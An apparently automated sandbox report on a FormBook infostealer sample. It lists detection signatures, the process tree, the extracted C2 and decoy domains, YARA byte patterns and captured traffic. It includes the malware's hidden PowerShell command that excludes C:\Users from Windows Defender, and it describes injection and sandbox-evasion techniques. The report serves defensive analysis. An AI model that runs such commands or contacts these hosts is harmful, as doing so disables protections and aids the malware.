Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Citvonvhciktufwvyzyhistnewdjgsoqdr.exe

Overview

General Information

Sample Name:Citvonvhciktufwvyzyhistnewdjgsoqdr.exe
Analysis ID:411769
MD5:4e71f90d1817f44313f4e101ef393968
SHA1:3932f9822134761e7bf9bc1902f8cc28b6820559
SHA256:aace20e28e61cb328da74ff938231b1ce9a07498d477efe3efc5c5d3d04b9dc1
Tags:exeFormbooksigned
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
DLL side loading technique detected
Drops PE files to the user root directory
Drops executables to the windows directory (C:\Windows) and starts them
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Execution from Suspicious Folder
Suspicious powershell command line found
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Non Interactive PowerShell
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Citvonvhciktufwvyzyhistnewdjgsoqdr.exe (PID: 7056 cmdline: 'C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe' MD5: 4E71F90D1817F44313F4E101EF393968)
    • cmd.exe (PID: 6252 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\stt.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 6592 cmdline: C:\Windows\system32\cmd.exe /K C:\Users\Public\PXOR.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • Netplwiz.exe (PID: 6408 cmdline: C:\Windows \System32\Netplwiz.exe MD5: F94B7FB6DAC49844D03C7087B2D8B472)
          • cmd.exe (PID: 6516 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Cdex.bat MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
            • conhost.exe (PID: 5684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • powershell.exe (PID: 6920 cmdline: powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command 'Add-MpPreference -ExclusionPath 'C:\Users'' MD5: 95000560239032BC68B4C2FDFCDEF913)
              • conhost.exe (PID: 6912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • Citvon.exe (PID: 1320 cmdline: 'C:\Users\Public\Citvon\Citvon.exe' MD5: 4E71F90D1817F44313F4E101EF393968)
    • Citvon.exe (PID: 2920 cmdline: C:\Users\Public\Citvon\Citvon.exe MD5: 4E71F90D1817F44313F4E101EF393968)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • WWAHost.exe (PID: 5252 cmdline: C:\Windows\SysWOW64\WWAHost.exe MD5: 370C260333EB3149EF4E49C8F64652A0)
        • autoconv.exe (PID: 5488 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
        • autofmt.exe (PID: 5556 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: 7FC345F685C2A58283872D851316ACC4)
        • msiexec.exe (PID: 5560 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
  • Citvon.exe (PID: 4424 cmdline: 'C:\Users\Public\Citvon\Citvon.exe' MD5: 4E71F90D1817F44313F4E101EF393968)
    • Citvon.exe (PID: 4044 cmdline: C:\Users\Public\Citvon\Citvon.exe MD5: 4E71F90D1817F44313F4E101EF393968)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.clinics.life/qku9/"], "decoy": ["infinitilifecenters.com", "newsondogs.com", "enonen.com", "skinnybrew.asia", "evaair-dailoan.com", "kakao.delivery", "kenistic.com", "dichvuquatanghtc.com", "avbs1.xyz", "dornhome.com", "uuyuii.com", "elearningeasygenerator.com", "basnne.com", "snkrclassics.com", "healthtechcentral.com", "earthhoodpal.com", "voorgoed.com", "lazycooked.com", "openrank.site", "georgeswebwerks.com", "diabluma.com", "kenekch.net", "fragrans.paris", "dov12.com", "traumainformed.love", "rocket3freedom.com", "smartgrowcultiva.com", "financial345.com", "maxsecuritycompany.com", "ibitr.com", "tamhoo.com", "reciclar.space", "agustoscimerapk-tr.com", "risingstarg.com", "kambosito.space", "bossdeal.online", "xn--avenr-wsa.com", "tauznora.com", "rest-blog.com", "amercadear.com", "xn--e1agggwgm.xn--p1acf", "paintwaterlilly.com", "yago.pro", "kmakeupbrushes.com", "shawnshimazu.design", "homeverf.com", "latromi.com", "machacekbakery.com", "jillsfreegift.com", "nationwidemovingamerica.com", "healthyred.xyz", "thrg33.club", "orbit-shop.com", "akgunreklam.xyz", "vewesyqy.xyz", "contorig2.com", "reiadarealestate.com", "pmxgear.com", "chennaigranites.com", "jmboprivacy.com", "genunid.com", "alegria.club", "alexfuture.net", "anixussohigh.com"]}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\Public\novtiC.urlMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001D.00000002.916527302.0000000001270000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000001D.00000002.916527302.0000000001270000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000001D.00000002.916527302.0000000001270000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    00000000.00000003.681744195.0000000003CA4000.00000004.00000001.sdmpMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
    • 0x1b4:$file: URL=
    • 0x198:$url_explicit: [InternetShortcut]
    00000014.00000003.794009092.0000000003CD4000.00000004.00000001.sdmpMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
    • 0x1d84:$file: URL=
    • 0x1d68:$url_explicit: [InternetShortcut]
    Click to see the 137 entries

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    3.1.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
      3.1.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      3.1.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x166a9:$sqlite3step: 68 34 1C 7B E1
      • 0x167bc:$sqlite3step: 68 34 1C 7B E1
      • 0x166d8:$sqlite3text: 68 38 2A 90 C5
      • 0x167fd:$sqlite3text: 68 38 2A 90 C5
      • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
      • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
      25.2.Citvon.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        25.2.Citvon.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        Click to see the 31 entries

        Sigma Overview

        System Summary:

        barindex
        Sigma detected: Execution from Suspicious FolderShow sources
        Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\Public\Citvon\Citvon.exe, CommandLine: C:\Users\Public\Citvon\Citvon.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Citvon\Citvon.exe, NewProcessName: C:\Users\Public\Citvon\Citvon.exe, OriginalFileName: C:\Users\Public\Citvon\Citvon.exe, ParentCommandLine: 'C:\Users\Public\Citvon\Citvon.exe' , ParentImage: C:\Users\Public\Citvon\Citvon.exe, ParentProcessId: 1320, ProcessCommandLine: C:\Users\Public\Citvon\Citvon.exe, ProcessId: 2920
        Sigma detected: Non Interactive PowerShellShow sources
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command 'Add-MpPreference -ExclusionPath 'C:\Users'', CommandLine: powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command 'Add-MpPreference -ExclusionPath 'C:\Users'', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Cdex.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6516, ProcessCommandLine: powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command 'Add-MpPreference -ExclusionPath 'C:\Users'', ProcessId: 6920

        Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Found malware configurationShow sources
        Source: 0000001D.00000002.916527302.0000000001270000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.clinics.life/qku9/"], "decoy": ["infinitilifecenters.com", "newsondogs.com", "enonen.com", "skinnybrew.asia", "evaair-dailoan.com", "kakao.delivery", "kenistic.com", "dichvuquatanghtc.com", "avbs1.xyz", "dornhome.com", "uuyuii.com", "elearningeasygenerator.com", "basnne.com", "snkrclassics.com", "healthtechcentral.com", "earthhoodpal.com", "voorgoed.com", "lazycooked.com", "openrank.site", "georgeswebwerks.com", "diabluma.com", "kenekch.net", "fragrans.paris", "dov12.com", "traumainformed.love", "rocket3freedom.com", "smartgrowcultiva.com", "financial345.com", "maxsecuritycompany.com", "ibitr.com", "tamhoo.com", "reciclar.space", "agustoscimerapk-tr.com", "risingstarg.com", "kambosito.space", "bossdeal.online", "xn--avenr-wsa.com", "tauznora.com", "rest-blog.com", "amercadear.com", "xn--e1agggwgm.xn--p1acf", "paintwaterlilly.com", "yago.pro", "kmakeupbrushes.com", "shawnshimazu.design", "homeverf.com", "latromi.com", "machacekbakery.com", "jillsfreegift.com", "nationwidemovingamerica.com", "healthyred.xyz", "thrg33.club", "orbit-shop.com", "akgunreklam.xyz", "vewesyqy.xyz", "contorig2.com", "reiadarealestate.com", "pmxgear.com", "chennaigranites.com", "jmboprivacy.com", "genunid.com", "alegria.club", "alexfuture.net", "anixussohigh.com"]}
        Multi AV Scanner detection for dropped fileShow sources
        Source: C:\Users\Public\Citvon\Citvon.exeMetadefender: Detection: 35%Perma Link
        Source: C:\Users\Public\Citvon\Citvon.exeReversingLabs: Detection: 65%
        Source: C:\Users\Public\NETUTILS.dllReversingLabs: Detection: 20%
        Source: C:\Windows \System32\NETUTILS.dllReversingLabs: Detection: 20%
        Multi AV Scanner detection for submitted fileShow sources
        Source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exeVirustotal: Detection: 70%Perma Link
        Source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exeMetadefender: Detection: 35%Perma Link
        Source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exeReversingLabs: Detection: 65%
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 0000001D.00000002.916527302.0000000001270000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000002.826581239.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.866605894.0000000000580000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000002.826744888.00000000004B0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000020.00000002.867119537.0000000000310000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000001.696290346.0000000000400000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000001.815038206.0000000000400000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.697862956.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.867284740.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000002.915615898.0000000000E50000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.865473652.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000002.827144868.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000001.796805895.0000000000400000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000002.916659708.00000000012A0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 3.1.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.Citvon.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.2.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.1.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.1.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.2.Citvon.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.1.Citvon.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.1.Citvon.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.1.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Machine Learning detection for dropped fileShow sources
        Source: C:\Users\Public\Citvon\Citvon.exeJoe Sandbox ML: detected
        Machine Learning detection for sampleShow sources
        Source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exeJoe Sandbox ML: detected
        Source: 25.2.Citvon.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
        Source: 3.2.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
        Source: 3.1.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
        Source: 27.2.Citvon.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
        Source: 27.1.Citvon.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
        Source: 25.1.Citvon.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
        Source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
        Source: Binary string: msiexec.pdb source: Citvon.exe, 00000019.00000002.867393416.0000000000960000.00000040.00000001.sdmp
        Source: Binary string: msiexec.pdbGCTL source: Citvon.exe, 00000019.00000002.867393416.0000000000960000.00000040.00000001.sdmp
        Source: Binary string: netplwiz.pdb source: Netplwiz.exe, 00000008.00000002.702460692.00007FF61AD35000.00000002.00020000.sdmp
        Source: Binary string: netplwiz.pdbGCTL source: Netplwiz.exe, 00000008.00000002.702460692.00007FF61AD35000.00000002.00020000.sdmp
        Source: Binary string: wntdll.pdbUGP source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, 00000003.00000002.698168920.0000000000B8F000.00000040.00000001.sdmp, Citvon.exe, 00000019.00000002.867470145.00000000009C0000.00000040.00000001.sdmp
        Source: Binary string: wntdll.pdb source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Citvon.exe, 00000019.00000002.867470145.00000000009C0000.00000040.00000001.sdmp
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 4x nop then pop edi

        Networking:

        barindex
        C2 URLs / IPs found in malware configurationShow sources
        Source: Malware configuration extractorURLs: www.clinics.life/qku9/
        Source: global trafficHTTP traffic detected: GET /qku9/?6lPDSJPH=4N2BxPNrndQhx4f7lxE8pKNuaIuSTDwEioPJ3Oup1sIb+BTUhD7Z9dt/VxNIQWQk9DQP&u8eTH=YdsPJP HTTP/1.1Host: www.georgeswebwerks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: Joe Sandbox ViewIP Address: 198.54.117.212 198.54.117.212
        Source: global trafficHTTP traffic detected: GET /qku9/?6lPDSJPH=4N2BxPNrndQhx4f7lxE8pKNuaIuSTDwEioPJ3Oup1sIb+BTUhD7Z9dt/VxNIQWQk9DQP&u8eTH=YdsPJP HTTP/1.1Host: www.georgeswebwerks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: unknownDNS traffic detected: queries for: onedrive.live.com
        Source: powershell.exe, 0000000D.00000002.752129080.00000172C22AF000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: Citvon.exe, 00000014.00000003.752641816.00000000008C4000.00000004.00000001.sdmpString found in binary or memory: http://crl.microsof
        Source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, 00000000.00000003.658488547.000000000094F000.00000004.00000001.sdmp, Citvon.exe, 00000011.00000003.736683075.000000000083A000.00000004.00000001.sdmp, Citvon.exe, 00000014.00000003.752669738.00000000008D0000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
        Source: Citvon.exe, 00000014.00000003.752641816.00000000008C4000.00000004.00000001.sdmpString found in binary or memory: http://mscrl.micro
        Source: powershell.exe, 0000000D.00000002.749646155.00000172BA104000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, 00000000.00000003.658488547.000000000094F000.00000004.00000001.sdmp, Citvon.exe, 00000011.00000003.736683075.000000000083A000.00000004.00000001.sdmp, Citvon.exe, 00000014.00000003.752669738.00000000008D0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
        Source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, 00000000.00000003.658494505.0000000000953000.00000004.00000001.sdmp, Citvon.exe, 00000011.00000003.736683075.000000000083A000.00000004.00000001.sdmp, Citvon.exe, 00000014.00000003.752669738.00000000008D0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
        Source: powershell.exe, 0000000D.00000002.752441482.00000172C23D0000.00000004.00000001.sdmpString found in binary or memory: http://osoft.com/PKI/doefault.htm0
        Source: powershell.exe, 0000000D.00000002.736725813.00000172AA2B1000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 0000000D.00000002.752441482.00000172C23D0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.microsoft.coT
        Source: powershell.exe, 0000000D.00000002.736959186.00000172AA43B000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
        Source: powershell.exe, 0000000D.00000002.735431704.00000172AA0A1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 0000000D.00000002.736959186.00000172AA43B000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
        Source: powershell.exe, 0000000D.00000002.736725813.00000172AA2B1000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 0000000D.00000002.749646155.00000172BA104000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 0000000D.00000002.749646155.00000172BA104000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 0000000D.00000002.749646155.00000172BA104000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
        Source: powershell.exe, 0000000D.00000002.736725813.00000172AA2B1000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 0000000D.00000003.711204031.00000172ABE21000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
        Source: powershell.exe, 0000000D.00000002.749646155.00000172BA104000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: Citvon.exe, 00000011.00000003.736694886.000000000083E000.00000004.00000001.sdmp, Citvon.exe, 00000014.00000003.752669738.00000000008D0000.00000004.00000001.sdmpString found in binary or memory: https://xhtfga.dm.files.1drv.com/y4m8SMkzvpejvDLx8dnrECcyq_e2qmwA_A7cOWUQWdVRMq0yniUlzBSm_G1n5_On9Y_

        E-Banking Fraud:

        barindex
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 0000001D.00000002.916527302.0000000001270000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000002.826581239.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.866605894.0000000000580000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000002.826744888.00000000004B0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000020.00000002.867119537.0000000000310000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000001.696290346.0000000000400000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000001.815038206.0000000000400000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.697862956.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.867284740.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000002.915615898.0000000000E50000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.865473652.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000002.827144868.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000001.796805895.0000000000400000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000002.916659708.00000000012A0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 3.1.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.Citvon.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.2.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.1.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.1.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.2.Citvon.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.1.Citvon.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.1.Citvon.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.1.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPE

        System Summary:

        barindex
        Malicious sample detected (through community Yara rule)Show sources
        Source: 0000001D.00000002.916527302.0000000001270000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000001D.00000002.916527302.0000000001270000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
